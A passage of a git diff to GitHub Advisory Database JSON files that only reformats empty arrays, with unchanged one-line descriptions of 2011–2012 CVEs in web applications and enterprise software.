b/advisories/unreviewed/2022/05/GHSA-qc72-grw6-qfmg/GHSA-qc72-grw6-qfmg.json @@ -7,12 +7,8 @@ "CVE-2012-1198" ], "details": "base_ag_main.php in Basic Analysis and Security Engine (BASE) 1.4.5 allows remote attackers to execute arbitrary code by uploading contents of the file with an executable extension via a create action, then accessing it via a view action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qcg7-x5r6-58hf/GHSA-qcg7-x5r6-58hf.json b/advisories/unreviewed/2022/05/GHSA-qcg7-x5r6-58hf/GHSA-qcg7-x5r6-58hf.json index e8ff8b790af..598b9618dda 100644 --- a/advisories/unreviewed/2022/05/GHSA-qcg7-x5r6-58hf/GHSA-qcg7-x5r6-58hf.json +++ b/advisories/unreviewed/2022/05/GHSA-qcg7-x5r6-58hf/GHSA-qcg7-x5r6-58hf.json @@ -7,12 +7,8 @@ "CVE-2012-0733" ], "details": "IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1, when Integrated Windows authentication is used, allows remote authenticated users to obtain administrative privileges by hijacking a session associated with the service account.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qg78-xgfv-hmc9/GHSA-qg78-xgfv-hmc9.json b/advisories/unreviewed/2022/05/GHSA-qg78-xgfv-hmc9/GHSA-qg78-xgfv-hmc9.json index 7fb8008ba2b..7094aae72e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-qg78-xgfv-hmc9/GHSA-qg78-xgfv-hmc9.json +++ b/advisories/unreviewed/2022/05/GHSA-qg78-xgfv-hmc9/GHSA-qg78-xgfv-hmc9.json @@ -7,12 +7,8 @@ "CVE-2012-3431" ], "details": "The Teiid Java Database Connectivity (JDBC) socket, as used in JBoss Enterprise Data Services Platform before 5.3.0, does not encrypt login messages by default contrary to documentation and specification, which allows remote attackers to obtain login credentials via a man-in-the-middle (MITM) attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qgr3-m27x-jr59/GHSA-qgr3-m27x-jr59.json b/advisories/unreviewed/2022/05/GHSA-qgr3-m27x-jr59/GHSA-qgr3-m27x-jr59.json index 96cd0b68ab7..064e7ab0d77 100644 --- a/advisories/unreviewed/2022/05/GHSA-qgr3-m27x-jr59/GHSA-qgr3-m27x-jr59.json +++ b/advisories/unreviewed/2022/05/GHSA-qgr3-m27x-jr59/GHSA-qgr3-m27x-jr59.json @@ -7,12 +7,8 @@ "CVE-2012-0829" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in Mibew Messenger 1.6.4 and earlier allow remote attackers to hijack the authentication of operators for requests that insert cross-site scripting (XSS) sequences via the (1) address or (2) threadid parameters to operator/ban.php; or (3) geolinkparams, (4) title, or (5) chattitle parameters to operator/settings.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qhj9-vw2m-88rp/GHSA-qhj9-vw2m-88rp.json b/advisories/unreviewed/2022/05/GHSA-qhj9-vw2m-88rp/GHSA-qhj9-vw2m-88rp.json index db829b4c9d9..1d3f3944e96 100644 --- a/advisories/unreviewed/2022/05/GHSA-qhj9-vw2m-88rp/GHSA-qhj9-vw2m-88rp.json +++ b/advisories/unreviewed/2022/05/GHSA-qhj9-vw2m-88rp/GHSA-qhj9-vw2m-88rp.json @@ -7,12 +7,8 @@ "CVE-2012-2913" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Leaflet plugin 0.0.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) leaflet_layer.php or (2) leaflet_marker.php, as reachable through wp-admin/admin.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qhp6-c624-38q5/GHSA-qhp6-c624-38q5.json b/advisories/unreviewed/2022/05/GHSA-qhp6-c624-38q5/GHSA-qhp6-c624-38q5.json index d614d5fe7f4..9f54e25f531 100644 --- a/advisories/unreviewed/2022/05/GHSA-qhp6-c624-38q5/GHSA-qhp6-c624-38q5.json +++ b/advisories/unreviewed/2022/05/GHSA-qhp6-c624-38q5/GHSA-qhp6-c624-38q5.json @@ -7,12 +7,8 @@ "CVE-2012-1075" ], "details": "SQL injection vulnerability in the Documents download (rtg_files) extension before 1.5.2 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qm25-w56j-5qh8/GHSA-qm25-w56j-5qh8.json b/advisories/unreviewed/2022/05/GHSA-qm25-w56j-5qh8/GHSA-qm25-w56j-5qh8.json index b5410fa81fb..c25d441c004 100644 --- a/advisories/unreviewed/2022/05/GHSA-qm25-w56j-5qh8/GHSA-qm25-w56j-5qh8.json +++ b/advisories/unreviewed/2022/05/GHSA-qm25-w56j-5qh8/GHSA-qm25-w56j-5qh8.json @@ -7,12 +7,8 @@ "CVE-2012-2062" ], "details": "Open redirect vulnerability in the Redirecting click bouncer module for Drupal allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qp4g-hr6q-8w69/GHSA-qp4g-hr6q-8w69.json b/advisories/unreviewed/2022/05/GHSA-qp4g-hr6q-8w69/GHSA-qp4g-hr6q-8w69.json index 4cff1ad2d88..9882b378eed 100644 --- a/advisories/unreviewed/2022/05/GHSA-qp4g-hr6q-8w69/GHSA-qp4g-hr6q-8w69.json +++ b/advisories/unreviewed/2022/05/GHSA-qp4g-hr6q-8w69/GHSA-qp4g-hr6q-8w69.json @@ -7,12 +7,8 @@ "CVE-2012-1738" ], "details": "Unspecified vulnerability in the Oracle iPlanet Web Server component in Oracle Sun Products Suite Java System Web Server 6.1 and Oracle iPlanet Web Server 7.0 allows remote attackers to affect availability via unknown vectors related to Web Server.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qp4w-3crr-q28r/GHSA-qp4w-3crr-q28r.json b/advisories/unreviewed/2022/05/GHSA-qp4w-3crr-q28r/GHSA-qp4w-3crr-q28r.json index 7b2563f32d7..3f060e98a14 100644 --- a/advisories/unreviewed/2022/05/GHSA-qp4w-3crr-q28r/GHSA-qp4w-3crr-q28r.json +++ b/advisories/unreviewed/2022/05/GHSA-qp4w-3crr-q28r/GHSA-qp4w-3crr-q28r.json @@ -7,12 +7,8 @@ "CVE-2012-0933" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Acidcat CMS 3.5.1, 3.5.2, 3.5.6, and possibly earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin_colors.asp, (2) admin_config.asp, and (3) admin_cat_add.asp in admin/.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qp57-c66w-h9pw/GHSA-qp57-c66w-h9pw.json b/advisories/unreviewed/2022/05/GHSA-qp57-c66w-h9pw/GHSA-qp57-c66w-h9pw.json index 70727beef96..f30e47ccb09 100644 --- a/advisories/unreviewed/2022/05/GHSA-qp57-c66w-h9pw/GHSA-qp57-c66w-h9pw.json +++ b/advisories/unreviewed/2022/05/GHSA-qp57-c66w-h9pw/GHSA-qp57-c66w-h9pw.json @@ -7,12 +7,8 @@ "CVE-2012-0934" ], "details": "PHP remote file inclusion vulnerability in ajax/savetag.php in the Theme Tuner plugin for WordPress before 0.8 allows remote attackers to execute arbitrary PHP code via a URL in the tt-abspath parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qp7j-m6w8-5jjh/GHSA-qp7j-m6w8-5jjh.json b/advisories/unreviewed/2022/05/GHSA-qp7j-m6w8-5jjh/GHSA-qp7j-m6w8-5jjh.json index e94e6517e2a..452906833fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-qp7j-m6w8-5jjh/GHSA-qp7j-m6w8-5jjh.json +++ b/advisories/unreviewed/2022/05/GHSA-qp7j-m6w8-5jjh/GHSA-qp7j-m6w8-5jjh.json @@ -7,12 +7,8 @@ "CVE-2012-2329" ], "details": "Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qpg6-qgf5-9pr8/GHSA-qpg6-qgf5-9pr8.json b/advisories/unreviewed/2022/05/GHSA-qpg6-qgf5-9pr8/GHSA-qpg6-qgf5-9pr8.json index 2c0525518f9..dd5cbfb3d37 100644 --- a/advisories/unreviewed/2022/05/GHSA-qpg6-qgf5-9pr8/GHSA-qpg6-qgf5-9pr8.json +++ b/advisories/unreviewed/2022/05/GHSA-qpg6-qgf5-9pr8/GHSA-qpg6-qgf5-9pr8.json @@ -7,12 +7,8 @@ "CVE-2012-1935" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 3.5.x before 3.5.5 and 4.x before 4 RC4 allow remote attackers to inject arbitrary web script or HTML via the (1) Back parameter to admin/ad.php, or the (2) token or (3) f_email parameter to admin/password_check_token.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qphj-3vqc-57h9/GHSA-qphj-3vqc-57h9.json b/advisories/unreviewed/2022/05/GHSA-qphj-3vqc-57h9/GHSA-qphj-3vqc-57h9.json index cb926b143ed..03dfac9bd2c 100644 --- a/advisories/unreviewed/2022/05/GHSA-qphj-3vqc-57h9/GHSA-qphj-3vqc-57h9.json +++ b/advisories/unreviewed/2022/05/GHSA-qphj-3vqc-57h9/GHSA-qphj-3vqc-57h9.json @@ -7,12 +7,8 @@ "CVE-2012-2161" ], "details": "Cross-site scripting (XSS) vulnerability in deferredView.jsp in IBM Eclipse Help System (IEHS), as used in IBM Security AppScan Source 7.x and 8.x before 8.6 and IBM SPSS Data Collection Developer Library 6.0 and 6.0.1, allows remote attackers to inject arbitrary web script or HTML via a crafted URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qqh7-c6g3-7cgg/GHSA-qqh7-c6g3-7cgg.json b/advisories/unreviewed/2022/05/GHSA-qqh7-c6g3-7cgg/GHSA-qqh7-c6g3-7cgg.json index d05cc2266d6..997bbb9e8c1 100644 --- a/advisories/unreviewed/2022/05/GHSA-qqh7-c6g3-7cgg/GHSA-qqh7-c6g3-7cgg.json +++ b/advisories/unreviewed/2022/05/GHSA-qqh7-c6g3-7cgg/GHSA-qqh7-c6g3-7cgg.json @@ -7,12 +7,8 @@ "CVE-2012-3329" ], "details": "IBM Advanced Settings Utility (ASU) through 3.62 and 3.70 through 9.21 and Bootable Media Creator (BoMC) through 2.30 and 3.00 through 9.21 on Linux allow local users to overwrite arbitrary files via a symlink attack on a (1) temporary file or (2) log file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qqqh-wm2v-8949/GHSA-qqqh-wm2v-8949.json b/advisories/unreviewed/2022/05/GHSA-qqqh-wm2v-8949/GHSA-qqqh-wm2v-8949.json index aebaa60c2b3..c77a0d6fda2 100644 --- a/advisories/unreviewed/2022/05/GHSA-qqqh-wm2v-8949/GHSA-qqqh-wm2v-8949.json +++ b/advisories/unreviewed/2022/05/GHSA-qqqh-wm2v-8949/GHSA-qqqh-wm2v-8949.json @@ -7,12 +7,8 @@ "CVE-2012-2939" ], "details": "Multiple unrestricted file upload vulnerabilities in Travelon Express 6.2.2 allow remote authenticated users to execute arbitrary code by uploading a file with an executable extension using (1) airline-edit.php, (2) hotel-image-add.php, or (3) hotel-add.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qqv2-xmmg-gh3q/GHSA-qqv2-xmmg-gh3q.json b/advisories/unreviewed/2022/05/GHSA-qqv2-xmmg-gh3q/GHSA-qqv2-xmmg-gh3q.json index bdf40cec3e2..87326596d83 100644 --- a/advisories/unreviewed/2022/05/GHSA-qqv2-xmmg-gh3q/GHSA-qqv2-xmmg-gh3q.json +++ b/advisories/unreviewed/2022/05/GHSA-qqv2-xmmg-gh3q/GHSA-qqv2-xmmg-gh3q.json @@ -7,12 +7,8 @@ "CVE-2012-2513" ], "details": "The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qr7p-wfwf-hpc9/GHSA-qr7p-wfwf-hpc9.json b/advisories/unreviewed/2022/05/GHSA-qr7p-wfwf-hpc9/GHSA-qr7p-wfwf-hpc9.json index 12cc0a11d27..430ef2a122c 100644 --- a/advisories/unreviewed/2022/05/GHSA-qr7p-wfwf-hpc9/GHSA-qr7p-wfwf-hpc9.json +++ b/advisories/unreviewed/2022/05/GHSA-qr7p-wfwf-hpc9/GHSA-qr7p-wfwf-hpc9.json @@ -7,12 +7,8 @@ "CVE-2012-2583" ], "details": "Cross-site scripting (XSS) vulnerability in Mini Mail Dashboard Widget plugin 1.42 for WordPress allows remote attackers to inject arbitrary web script or HTML via the body of an email.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qv8f-prp5-4524/GHSA-qv8f-prp5-4524.json b/advisories/unreviewed/2022/05/GHSA-qv8f-prp5-4524/GHSA-qv8f-prp5-4524.json index 6434fdefb08..17820305b8a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qv8f-prp5-4524/GHSA-qv8f-prp5-4524.json +++ b/advisories/unreviewed/2022/05/GHSA-qv8f-prp5-4524/GHSA-qv8f-prp5-4524.json @@ -7,12 +7,8 @@ "CVE-2011-5162" ], "details": "Stack-based buffer overflow in GOM Player 2.1.33.5071 allows user-assisted remote attackers to execute arbitrary code via a .ASX file with a long URI in the \"ref href\" tag. NOTE: this issue exists because of a CVE-2007-0707 regression.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qv9r-g2q5-56r8/GHSA-qv9r-g2q5-56r8.json b/advisories/unreviewed/2022/05/GHSA-qv9r-g2q5-56r8/GHSA-qv9r-g2q5-56r8.json index f8c48305658..e8ff38b3fbe 100644 --- a/advisories/unreviewed/2022/05/GHSA-qv9r-g2q5-56r8/GHSA-qv9r-g2q5-56r8.json +++ b/advisories/unreviewed/2022/05/GHSA-qv9r-g2q5-56r8/GHSA-qv9r-g2q5-56r8.json @@ -7,12 +7,8 @@ "CVE-2012-0869" ], "details": "Cross-site scripting (XSS) vulnerability in fup in Frams' Fast File EXchange (F*EX, aka fex) before 20120215 allows remote attackers to inject arbitrary web script or HTML via the id parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qvf9-hh82-8h57/GHSA-qvf9-hh82-8h57.json b/advisories/unreviewed/2022/05/GHSA-qvf9-hh82-8h57/GHSA-qvf9-hh82-8h57.json index 66e95c010eb..4f411a62f9e 100644 --- a/advisories/unreviewed/2022/05/GHSA-qvf9-hh82-8h57/GHSA-qvf9-hh82-8h57.json +++ b/advisories/unreviewed/2022/05/GHSA-qvf9-hh82-8h57/GHSA-qvf9-hh82-8h57.json @@ -7,12 +7,8 @@ "CVE-2012-3113" ], "details": "Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.0.20 allows remote authenticated users to affect confidentiality and integrity, related to EPERF.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qwc3-2jvx-f4c4/GHSA-qwc3-2jvx-f4c4.json b/advisories/unreviewed/2022/05/GHSA-qwc3-2jvx-f4c4/GHSA-qwc3-2jvx-f4c4.json index 1a825647024..c8e2b892530 100644 --- a/advisories/unreviewed/2022/05/GHSA-qwc3-2jvx-f4c4/GHSA-qwc3-2jvx-f4c4.json +++ b/advisories/unreviewed/2022/05/GHSA-qwc3-2jvx-f4c4/GHSA-qwc3-2jvx-f4c4.json @@ -7,12 +7,8 @@ "CVE-2012-3000" ], "details": "Multiple SQL injection vulnerabilities in sam/admin/reports/php/saveSettings.php in the (1) APM WebGUI in F5 BIG-IP LTM, GTM, ASM, Link Controller, PSM, APM, Edge Gateway, and Analytics and (2) AVR WebGUI in WebAccelerator and WOM 11.2.x before 11.2.0-HF3 and 11.2.x before 11.2.1-HF3 allow remote authenticated users to execute arbitrary SQL commands via the defaultQuery parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qwfp-wj8c-9pxg/GHSA-qwfp-wj8c-9pxg.json b/advisories/unreviewed/2022/05/GHSA-qwfp-wj8c-9pxg/GHSA-qwfp-wj8c-9pxg.json index e8bd43915e0..30d370205c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-qwfp-wj8c-9pxg/GHSA-qwfp-wj8c-9pxg.json +++ b/advisories/unreviewed/2022/05/GHSA-qwfp-wj8c-9pxg/GHSA-qwfp-wj8c-9pxg.json @@ -7,12 +7,8 @@ "CVE-2012-3313" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qwv6-5f6h-6cg4/GHSA-qwv6-5f6h-6cg4.json b/advisories/unreviewed/2022/05/GHSA-qwv6-5f6h-6cg4/GHSA-qwv6-5f6h-6cg4.json index 33b858a4de9..4a2cde87876 100644 --- a/advisories/unreviewed/2022/05/GHSA-qwv6-5f6h-6cg4/GHSA-qwv6-5f6h-6cg4.json +++ b/advisories/unreviewed/2022/05/GHSA-qwv6-5f6h-6cg4/GHSA-qwv6-5f6h-6cg4.json @@ -7,12 +7,8 @@ "CVE-2012-3224" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.1.0, 5.2.0, and 5.3.0 through 5.3.4 allows remote authenticated users to affect confidentiality, related to BASE.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qx3h-g3gw-6vrx/GHSA-qx3h-g3gw-6vrx.json b/advisories/unreviewed/2022/05/GHSA-qx3h-g3gw-6vrx/GHSA-qx3h-g3gw-6vrx.json index 72ae159fea0..c4aa3e6fd10 100644 --- a/advisories/unreviewed/2022/05/GHSA-qx3h-g3gw-6vrx/GHSA-qx3h-g3gw-6vrx.json +++ b/advisories/unreviewed/2022/05/GHSA-qx3h-g3gw-6vrx/GHSA-qx3h-g3gw-6vrx.json @@ -7,12 +7,8 @@ "CVE-2012-2141" ], "details": "Array index error in the handle_nsExtendOutput2Table function in agent/mibgroup/agent/extend.c in Net-SNMP 5.7.1 allows remote authenticated users to cause a denial of service (out-of-bounds read and snmpd crash) via an SNMP GET request for an entry not in the extension table.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -68,9 +64,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qx44-f32h-r3p6/GHSA-qx44-f32h-r3p6.json b/advisories/unreviewed/2022/05/GHSA-qx44-f32h-r3p6/GHSA-qx44-f32h-r3p6.json index 92ec76cdfc7..58619a25e12 100644 --- a/advisories/unreviewed/2022/05/GHSA-qx44-f32h-r3p6/GHSA-qx44-f32h-r3p6.json +++ b/advisories/unreviewed/2022/05/GHSA-qx44-f32h-r3p6/GHSA-qx44-f32h-r3p6.json @@ -7,12 +7,8 @@ "CVE-2012-1085" ], "details": "Unspecified vulnerability in the BE User Switch (beuserswitch) extension 0.0.1 for TYPO3 allows remote attackers to obtain sensitive information via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qxxj-cqjc-mfm3/GHSA-qxxj-cqjc-mfm3.json b/advisories/unreviewed/2022/05/GHSA-qxxj-cqjc-mfm3/GHSA-qxxj-cqjc-mfm3.json index ae1251d6adc..5d0f7e171c1 100644 --- a/advisories/unreviewed/2022/05/GHSA-qxxj-cqjc-mfm3/GHSA-qxxj-cqjc-mfm3.json +++ b/advisories/unreviewed/2022/05/GHSA-qxxj-cqjc-mfm3/GHSA-qxxj-cqjc-mfm3.json @@ -7,12 +7,8 @@ "CVE-2011-4847" ], "details": "SQL injection vulnerability in the Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 allows remote attackers to execute arbitrary SQL commands via a certificateslist cookie to notification@/.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r395-wfp2-8c78/GHSA-r395-wfp2-8c78.json b/advisories/unreviewed/2022/05/GHSA-r395-wfp2-8c78/GHSA-r395-wfp2-8c78.json index f08d8878255..78baf179839 100644 --- a/advisories/unreviewed/2022/05/GHSA-r395-wfp2-8c78/GHSA-r395-wfp2-8c78.json +++ b/advisories/unreviewed/2022/05/GHSA-r395-wfp2-8c78/GHSA-r395-wfp2-8c78.json @@ -7,12 +7,8 @@ "CVE-2012-2925" ], "details": "SQL injection vulnerability in engine.php in Simple PHP Agenda 2.2.8 allows remote attackers to execute arbitrary SQL commands via the priority parameter in an addTodo action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r3vw-3h9q-5q3r/GHSA-r3vw-3h9q-5q3r.json b/advisories/unreviewed/2022/05/GHSA-r3vw-3h9q-5q3r/GHSA-r3vw-3h9q-5q3r.json index 550c7e5af34..1e8ecccd301 100644 --- a/advisories/unreviewed/2022/05/GHSA-r3vw-3h9q-5q3r/GHSA-r3vw-3h9q-5q3r.json +++ b/advisories/unreviewed/2022/05/GHSA-r3vw-3h9q-5q3r/GHSA-r3vw-3h9q-5q3r.json @@ -7,12 +7,8 @@ "CVE-2012-1020" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in login.php in NexorONE Online Banking allow remote attackers to inject arbitrary web script or HTML via the (1) visitor_language parameter to register.php or (2) message parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r3wp-gfpm-rjg8/GHSA-r3wp-gfpm-rjg8.json b/advisories/unreviewed/2022/05/GHSA-r3wp-gfpm-rjg8/GHSA-r3wp-gfpm-rjg8.json index 08a7f1b860f..6fd0b07f432 100644 --- a/advisories/unreviewed/2022/05/GHSA-r3wp-gfpm-rjg8/GHSA-r3wp-gfpm-rjg8.json +++ b/advisories/unreviewed/2022/05/GHSA-r3wp-gfpm-rjg8/GHSA-r3wp-gfpm-rjg8.json @@ -7,12 +7,8 @@ "CVE-2012-1009" ], "details": "NetSarang Xlpd 4 Build 0100 and NetSarang Xmanager Enterprise 4 Build 0186 allow remote attackers to cause a denial of service (daemon crash) via a malformed LPD request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r4v4-hvh4-c2h8/GHSA-r4v4-hvh4-c2h8.json b/advisories/unreviewed/2022/05/GHSA-r4v4-hvh4-c2h8/GHSA-r4v4-hvh4-c2h8.json index c32e9ae1b66..14ca9c599ff 100644 --- a/advisories/unreviewed/2022/05/GHSA-r4v4-hvh4-c2h8/GHSA-r4v4-hvh4-c2h8.json +++ b/advisories/unreviewed/2022/05/GHSA-r4v4-hvh4-c2h8/GHSA-r4v4-hvh4-c2h8.json @@ -7,12 +7,8 @@ "CVE-2012-1059" ], "details": "Cross-site scripting (XSS) vulnerability in osCommerce/OM/Core/Site/Shop/Application/Cart/pages/main.php in OSCommerce Online Merchant 3.0.2 allows remote attackers to inject arbitrary web script or HTML via the value_title parameter, as demonstrated using the \"Front\" field in the shirt module.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r6w2-wcgh-gxjv/GHSA-r6w2-wcgh-gxjv.json b/advisories/unreviewed/2022/05/GHSA-r6w2-wcgh-gxjv/GHSA-r6w2-wcgh-gxjv.json index 4a01014cb71..d3ccff3d969 100644 --- a/advisories/unreviewed/2022/05/GHSA-r6w2-wcgh-gxjv/GHSA-r6w2-wcgh-gxjv.json +++ b/advisories/unreviewed/2022/05/GHSA-r6w2-wcgh-gxjv/GHSA-r6w2-wcgh-gxjv.json @@ -7,12 +7,8 @@ "CVE-2012-4172" ], "details": "Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2012-4173, CVE-2012-4174, CVE-2012-4175, and CVE-2012-5273.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r73q-q9rc-v79m/GHSA-r73q-q9rc-v79m.json b/advisories/unreviewed/2022/05/GHSA-r73q-q9rc-v79m/GHSA-r73q-q9rc-v79m.json index a98690e961e..3f94db5db7b 100644 --- a/advisories/unreviewed/2022/05/GHSA-r73q-q9rc-v79m/GHSA-r73q-q9rc-v79m.json +++ b/advisories/unreviewed/2022/05/GHSA-r73q-q9rc-v79m/GHSA-r73q-q9rc-v79m.json @@ -7,12 +7,8 @@ "CVE-2012-0913" ], "details": "SQL injection vulnerability in checklogin.aspx in ICloudCenter ICTimeAttendance 1.0 allows remote attackers to execute arbitrary SQL commands via the passw parameter. NOTE: Some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r759-v267-mx9j/GHSA-r759-v267-mx9j.json b/advisories/unreviewed/2022/05/GHSA-r759-v267-mx9j/GHSA-r759-v267-mx9j.json index 667de081557..f04a6f7d673 100644 --- a/advisories/unreviewed/2022/05/GHSA-r759-v267-mx9j/GHSA-r759-v267-mx9j.json +++ b/advisories/unreviewed/2022/05/GHSA-r759-v267-mx9j/GHSA-r759-v267-mx9j.json @@ -7,12 